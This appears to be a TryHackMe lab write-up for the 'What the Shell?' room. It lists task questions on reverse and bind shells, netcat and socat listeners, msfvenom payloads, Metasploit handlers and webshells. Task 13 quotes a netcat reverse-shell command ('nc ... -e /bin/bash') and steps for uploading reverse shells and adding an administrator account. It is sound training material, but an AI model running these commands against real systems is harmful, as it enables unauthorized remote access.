THM | What the Shell?

October 14, 2022 · 5 min read

Shells and Privilege Escalation | What the Shell? | Summary:

Disclaimer: Please note that this write-up is NOT intended to replace the original room or its content, but rather serve as supplementary material for those who are stuck and need additional guidance.

Task | 01 | What is a shell?

Question 1: Read and understand the introduction.

Task | 02 | Tools

Question 1: Read the above and check out the links!

Task | 03 | Types of Shell

Question 1: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

Question 2: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

Question 3: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

Task | 04 | Netcat

Question 1: Which option tells netcat to listen?

Question 2: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

Task | 05 | Netcat Shell Stabilisation

Question 1: How would you change your terminal size to have 238 columns?

Question 2: What is the syntax for setting up a Python3 webserver on port 80?

Task | 06 | Socat

Question 1: How would we get socat to listen on TCP port 8080?

Task | 07 | Socat Encrypted Shells

Question 1: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"

Question 2: If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

Task | 08 | Common Shell Payloads

Question 1: What command can be used to create a named pipe in Linux?

Question 2: Look through the linked Payloads all the Things Reverse Shell Cheatsheet and familiarise yourself with the languages available.

Task | 09 | msfvenom

Question 1: Generate a staged reverse shell for a 64 bit Windows target, in a .exe format using your TryHackMe tun0 IP address and a chosen port.

Question 2: Which symbol is used to show that a shell is stageless?

Question 3: What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell

Task | 10 | Metasploit multi/handler

Question 1: What command can be used to start a listener in the background?

Question 2: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

Task | 11 | WebShells

Question 1: Read the WebShells information.

Task | 12 | Next Steps

Question 1: Read the above information

Task | 13 | Practice and Examples

Question 1: Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine.

Question 2: Navigate to /usr/share/webshells/php/php-reverse-shell.php in Kali and change the IP and port to match your tun0 IP with a custom port. Set up a netcat listener, then upload and activate the shell.

Question 3: Log into the Linux machine over SSH using the credentials in task 14. Use the techniques in Task 8 to experiment with bind and reverse netcat shells.

Question 4: Practice reverse and bind shells using Socat on the Linux machine. Try both the normal and special techniques.

Question 5: Look through Payloads all the Things and try some of the other reverse shell techniques. Try to analyse them and see why they work.

Question 6: Switch to the Windows VM. Try uploading and activating the php-reverse-shell. Does this work?

Question 7: Upload a webshell on the Windows target and try to obtain a reverse shell using Powershell.

Question 8: The webserver is running with SYSTEM privileges. Create a new user and add it to the "administrators" group, then login over RDP or WinRM.

Question 9: Experiment using socat and netcat to obtain reverse and bind shells on the Windows Target.

Question 10: Create a 64bit Windows Meterpreter shell using msfvenom and upload it to the Windows Target. Activate the shell and catch it with multi/handler. Experiment with the features of this shell.

Question 11: Create both staged and stageless meterpreter shells for either target. Upload and manually activate them, catching the shell with netcat -- does this work?

Task | 14 | Linux Practice Box

Question 1: No Answer Required

Task | 15 | Windows Practice Box

Question 1: No answer required

Shells and Privilege Escalation | What the Shell? | Summary:​

Task | 01 | What is a shell?​

Task | 02 | Tools​

Task | 03 | Types of Shell​

Task | 04 | Netcat​

Task | 05 | Netcat Shell Stabilisation​

Task | 06 | Socat​

Task | 07 | Socat Encrypted Shells​

Task | 08 | Common Shell Payloads​

Task | 09 | msfvenom​

Task | 10 | Metasploit multi/handler​

Task | 11 | WebShells​

Task | 12 | Next Steps​

Task | 13 | Practice and Examples​

Task | 14 | Linux Practice Box​

Task | 15 | Windows Practice Box​